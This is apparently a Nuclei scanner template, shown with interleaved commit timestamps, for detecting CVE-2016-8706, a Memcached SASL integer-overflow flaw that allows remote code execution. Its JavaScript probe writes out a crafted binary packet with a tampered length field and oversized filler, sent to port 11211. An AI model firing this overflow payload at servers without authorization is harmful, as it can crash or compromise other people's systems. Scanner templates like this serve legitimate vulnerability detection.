2023-10-30 13:36:00 +05:30
id : CVE-2016-8706
2023-11-13 16:03:23 +05:30
2023-10-30 13:36:00 +05:30
info :
2023-11-14 11:23:08 +05:30
name : Memcached Server SASL Authentication - Remote Code Execution
2023-10-30 13:36:00 +05:30
author : pussycat0x
severity : high
2023-11-13 16:03:23 +05:30
description : |
2023-11-20 06:35:10 +00:00
An integer overflow in process_bin_sasl_auth function in Memcached, which is responsible for authentication commands of Memcached binary protocol, can be abused to cause heap overflow and lead to remote code execution.
2023-10-30 13:36:00 +05:30
reference :
- https://github.com/Medicean/VulApps/blob/master/m/memcached/cve-2016-8706/poc.py
- https://nvd.nist.gov/vuln/detail/CVE-2016-8706
2023-11-20 06:35:10 +00:00
- http://rhn.redhat.com/errata/RHSA-2016-2819.html
- http://www.debian.org/security/2016/dsa-3704
- http://www.securitytracker.com/id/1037333
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 8.1
cve-id : CVE-2016-8706
cwe-id : CWE-190
2024-03-04 08:20:22 +00:00
epss-score : 0.89998
2024-04-08 17:04:33 +05:30
epss-percentile : 0.98714
2023-11-20 06:35:10 +00:00
cpe : cpe:2.3:a:memcached:memcached:*:*:*:*:*:*:*:*
2023-10-30 13:36:00 +05:30
metadata :
2025-05-27 10:39:47 +08:00
max-request : 1
2023-11-20 06:35:10 +00:00
vendor : memcached
product : memcached
2023-11-13 16:03:23 +05:30
verfied : true
2023-10-30 13:36:00 +05:30
tags : cve,cve2016,rce,js,memcached
2025-05-27 10:39:47 +08:00
2023-10-30 13:36:00 +05:30
javascript :
2024-07-10 17:38:01 +05:30
- pre-condition : |
isPortOpen(Host,Port);
code : |
2023-10-30 13:36:00 +05:30
let packet = bytes.NewBuffer();
packet.Write(new Uint8Array([0x80, 0x21]))
let cmd = 'stats'
packet.WriteString(cmd)
packet.Pack("!H", [32]);
packet.Pack("!I", [1]);
let buzz = Array(1000).fill("A").join('');
packet.WriteString(buzz)
const c = require("nuclei/net");
let conn = c.Open('tcp', `${Host}:${Port}`);
conn.SendHex(packet.Hex());
conn.RecvString();
args :
Host : "{{Host}}"
Port : 11211
matchers-condition : and
matchers :
- type : word
words :
- "Invalid arguments"
- type : word
words :
- "Auth failure"
negative : true
2024-12-01 13:57:55 +00:00
# digest: 4a0a004730450220383bbb7799bd6d7c41a424f73403d72b74a250524bafced2284dc91f813cb1cc022100d293f668c8df2fc5299025d834ac92832487e05bd6d145b2368433e30d478a20:922c64590222798bb761d5b6d8e72950